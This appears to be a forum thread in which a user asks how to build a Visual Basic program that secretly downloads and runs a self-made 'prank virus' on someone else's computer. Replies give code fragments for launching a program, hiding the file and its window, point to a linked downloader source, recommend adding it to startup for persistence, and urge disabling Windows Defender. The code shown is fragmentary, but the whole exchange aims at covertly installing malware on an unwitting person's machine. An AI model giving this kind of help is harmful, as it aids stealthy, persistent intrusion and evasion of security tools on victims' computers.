Results 1 to 11 of 11
  1. #1
    deocute's Avatar
    Join Date
    Oct 2009
    Gender
    male
    Location
    Philippines
    Posts
    29
    Reputation
    10
    Thanks
    0

    [Question] Code for Downloading

    is it possible to make a vb program that can download and run the application hidden from the user.

    gonna make a prank program that will download a prank virus i have made and run it w/o the user knowing it.

  2. #2
    Wandering Scripter's Avatar
    Join Date
    Nov 2009
    Gender
    male
    Posts
    10
    Reputation
    10
    Thanks
    1
    oi. Yeah, it can be done, but in this case google is your friend.

    I'm too lazy to write it up at this moment, but I can give you half of what you need (a source code for a downloader) the rest is up to you, cus starting programs is uber easy.

    with
    Code:
    Imports System.Diagnostics.Process
    Then its just

    Code:
    Start("Insert program path here")


    Downloader source code:
    www. mega upload .com/?d=RHLPJJS0


    Remove the spaces, it wont let me post links

  3. #3
    deocute's Avatar
    Join Date
    Oct 2009
    Gender
    male
    Location
    Philippines
    Posts
    29
    Reputation
    10
    Thanks
    0
    TY very much, ok another question, how will i hide the program from the user

  4. #4
    K4GE's Avatar
    Join Date
    Mar 2009
    Gender
    male
    Posts
    311
    Reputation
    13
    Thanks
    65
    My Mood
    Inspired
    Code:
     SetAttr("Location", FileAttribute.Hidden)

  5. #5
    stevethehacker's Avatar
    Join Date
    Sep 2009
    Gender
    male
    Location
    USA bitch
    Posts
    416
    Reputation
    14
    Thanks
    51
    My Mood
    Bored
    im not sure wat you mean? like are you on your friends computer and you want to download something onto it and run it or do you want some1 to download something and it will run hidden as a prank. If you do you will need a code that makes it run from log-in that way everytime they log in the program will run

  6. #6
    Zoom's Avatar
    Join Date
    May 2009
    Gender
    male
    Location
    Your going on my 24/7 DDoS hit list.
    Posts
    8,552
    Reputation
    127
    Thanks
    5,970
    My Mood
    Happy
    How to add a program to startup:
    -Rest in peace leechers-

    Your PM box is 100% full.

  7. #7
    Wandering Scripter's Avatar
    Join Date
    Nov 2009
    Gender
    male
    Posts
    10
    Reputation
    10
    Thanks
    1
    Theres code to make it start at startup, and to hide it from the user, make sure..

    for example 'Form1'

    form1.showintaskbar = false
    form1.controlbox = false
    form1.formborderstyle = none
    form1.hidden = true

  8. #8
    Bombsaway707's Avatar
    Join Date
    Jun 2009
    Gender
    male
    Location
    Gym
    Posts
    8,799
    Reputation
    791
    Thanks
    4,004
    My Mood
    Amused
    Just so yall know the adding stuff to startup is blocked by Windows Defender. Cuz i made a virus but windows defender wouldnt lemme add it to start up

  9. #9
    Zoom's Avatar
    Join Date
    May 2009
    Gender
    male
    Location
    Your going on my 24/7 DDoS hit list.
    Posts
    8,552
    Reputation
    127
    Thanks
    5,970
    My Mood
    Happy
    Quote Originally Posted by bombsaway707 View Post
    Just so yall know the adding stuff to startup is blocked by Windows Defender. Cuz i made a virus but windows defender wouldnt lemme add it to start up
    Try disable it, windows defender = Uninstall . Itīs dosenīt do anything!
    -Rest in peace leechers-

    Your PM box is 100% full.

  10. #10
    stevethehacker's Avatar
    Join Date
    Sep 2009
    Gender
    male
    Location
    USA bitch
    Posts
    416
    Reputation
    14
    Thanks
    51
    My Mood
    Bored
    Quote Originally Posted by bombsaway707 View Post
    Just so yall know the adding stuff to startup is blocked by Windows Defender. Cuz i made a virus but windows defender wouldnt lemme add it to start up
    maybe its different for every computer because it is different on my computer. what OS you running?

  11. #11
    Zoom's Avatar
    Join Date
    May 2009
    Gender
    male
    Location
    Your going on my 24/7 DDoS hit list.
    Posts
    8,552
    Reputation
    127
    Thanks
    5,970
    My Mood
    Happy
    Quote Originally Posted by stevethehacker View Post
    maybe its different for every computer because it is different on my computer. what OS you running?
    It may donīt start because he made a super trojan worm horse on his startup (maybe) Thatīs maybe why it wont start! Idk what the problem can be in WD.
    -Rest in peace leechers-

    Your PM box is 100% full.

Similar Threads

  1. [Help] Codes for Downloading Progress[Solved]
    By karldeovbnet in forum Visual Basic Programming
    Replies: 5
    Last Post: 02-27-2011, 04:50 AM
  2. [Question] Is this a correct code for CFPH?
    By ovenran in forum CrossFire Hack Coding / Programming / Source Code
    Replies: 8
    Last Post: 09-04-2010, 03:58 PM
  3. [SOLVED]question| codes for console
    By xloyer in forum Call of Duty Modern Warfare 2 Help
    Replies: 6
    Last Post: 06-12-2010, 06:20 AM
  4. Replies: 37
    Last Post: 06-20-2006, 04:24 PM
  5. Replies: 3
    Last Post: 02-09-2006, 03:51 PM

Tags for this Thread